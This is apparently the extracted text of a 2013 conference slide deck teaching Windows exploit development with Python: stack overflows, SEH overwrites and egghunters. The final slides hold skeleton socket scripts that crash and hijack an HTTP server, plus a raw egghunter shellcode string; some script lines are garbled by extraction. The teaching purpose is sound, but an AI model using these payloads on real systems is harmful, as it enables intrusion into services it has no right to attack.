1.EXPLOITDEVELOPMENTWITH PYTHONTom Gregoryid:python Gathering27 April 2013

2. AGENDA Memory Stack/Buffer Overflow Structured Exception Handler (SEH) Escape from small space Egghunter Demo 3. Args./EnvironmentStackUnused MemoryHeap (dynamic data)Static Data .dataProgram Code .textPROCESS MEMORY LAYOUTHigh addressesTop of memory0xFFFFFFFFLow addresses0x00000000Stack grows down byprocedures callHeap grows up e.g. bymalloc and new 4. STACK BUFFER OVERFLOW#include void foo (char *bar){char c[12];strcpy(c, bar); // no bounds checking...}int main (int argc, char **argv){foo(argv[1]);} 5. STACK BUFFER OVERFLOWUnallocated stackchar c[12]char *barSaved framepointer(EBP)Return Address(EIP)Parent routinesstackMemory addressStack growth 6. STACK BUFFER OVERFLOWUnallocated stackchar c[12]char *barSaved framepointer(EBP)Return Address(EIP)Parent routinesstackMemory addressStack growthh e l l0o 7. STACK BUFFER OVERFLOWUnallocated stackMemory addressStack growthA A A AA A A AA A A AA A A AA A A AA A A AA A A Ax08 x35 xc0 x80Fill the stack with AOverwritten return addressat 0x80c03508Parent routinesstackLittleEndian0x80c03508 8. WHAT IS SEH?This structure ( also called a SEH record) is 8 bytes and has 2 (4bytes each) elements : a pointer to the next exception_registration structure (inessence, to the next SEH record, in case the current handler isunable the handle the exception) a pointer, the address of the actual code of the exception handler.(SE Handler) 9. WHAT IS SEH?Image was taken without permission from http://images.google.com 10. LOOK AT THE SEH STRUCTUREBeginning of SEH chain SEH chain will be placed at the top of the main data block It also called FS:[0] chain as well (on intel: mov [reg], dword ptrfs:[0])End of seh chain Is indicated by 0xFFFFFFFF Will trigger improper termination to the program 11. HOW SEH WORKS?StackTEBFS[0]: 0012FF40 0012FF400012FF440012FFB0 : next SEH record7C839AD8 : SE Handler0012FFB00012FFB40012FFE0 : next SEH record0040109A : SE Handler0012FFE00012FFE4FFFFFFFF : next SEH record7C839AD8 : SE Handler 12. PROTECTIONS AGAINST SEHXOR before the exception handler is called, all registers are XORedwith each other, so it will make them all point to 0x00000000DEP & Stack Cookies Stack Cookies or Canary is setup via C++ compiler options DEP will mark the memory stack to no execute. It was introduced since Windows XP SP2 and Windows 2003,enabled by default on Windows Vista and 7 Those two protections can make it harder to build exploits. 13. PROTECTIONS AGAINST SEHSafeSEH additional protection was added to compilers, helping to stop theabuse of SEH overwrites. It will check the original value of SEH, if it overwritten, SafeSEHwill try to bring it back to the original value. 14. ABUSING SEHOn direct RET technique: Simply find an instruction to jump to the stack, done.While on SEH Based: You cannot simply jump to the stack, because the registers areXORed. We can take advantage this exception handling condition byoverwrite the SE Handler address. The OS will know the exception handling routine, and pass it to nextSEH record. Pointer to next SEH will bring us to the shellcode. Game over! 15. ABUSING SEHIn other words, the payload must do the following things: Cause an exception. Without an exception, the SEH handler (theone you have overwritten/control) wont kick in. Overwrite the pointer to the next SEH record with some jumpcode(so it can jump to the shellcode) Overwrite the SE handler with a pointer to an instruction that willbring you back to next SEH and execute the jumpcode. The shellcode should be directly after the overwritten SE Handler.Some small jumpcode contained in the overwritten pointer tonext SEH record will jump to it). 16. ABUSING SEH When the exception occurred, the position on the stack will going likethis: Possible value to overwrite SE Handler are POP something, POPsomething and RETN to the stack. It will POP address that sit at the top of the stack, POP it again to takethe second address, and RETN to execute the third address (which isnow at the top of the stack)Top of stackOur pointer to next SEHaddress 17. ABUSING SEHImage was taken from http://corelan.bewith permission from Peter van Eeckhoutte (Corelan) 18. ESCAPE FROM SMALL SPACE Use Egghunter Staged shellcode Use small amount of custom shellcode to find the actual biggershellcode (the egg), by searching entire memory for the finalshellcode 19. EGGHUNTER There are 3 conditions that are important in order for thistechnique to work We must be able to jump to (jmp, call, push/ret) & execute some shellcode,the egghunter. The final shellcode must be available somewhere in memory (stack/heap/). You must tag or prepend the final shellcode with a unique string/marker/tag.This means that we will have to define the marker in the egg hunter code, andalso write it just in front of the actual shellcode. 20. ENOUGH TALKING! 21. 1ST SKELETON EXPLOIT: CRASH IT!#!/usr/bin/pythonfrom socket import *junk = "x41" * 10000s = socket(AF_INET, SOCK_STREAM)s.connect((x.x.x.x,8000))print "[+] Launching attack..s.send ("GET /" + payload + "HTTP/1.0rnrnrn")s.close() 22. 2ND SKELETON EXPLOIT: EIPOVERWRITE#!/usr/bin/pythonfrom socket import *junk = [random data generated from msf]s = socket(AF_INET, SOCK_STREAM)s.connect((x.x.x.x,8000))print "[+] Launching attack..s.send ("GET /" + payload + "HTTP/1.0rnrnrn")s.close() 23. 3RD SKELETON EXPLOIT: SMALLSPACE Egghunterx66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7 24. 4TH FINAL EXPLOIT Exploit DB http://www.exploit-db.com/exploits/19266/ Metasploit http://www.exploit-db.com/exploits/19291/ http://www.metasploit.com/modules/exploit/windows/http/ezserver_http 25. EOFtom@spentera.com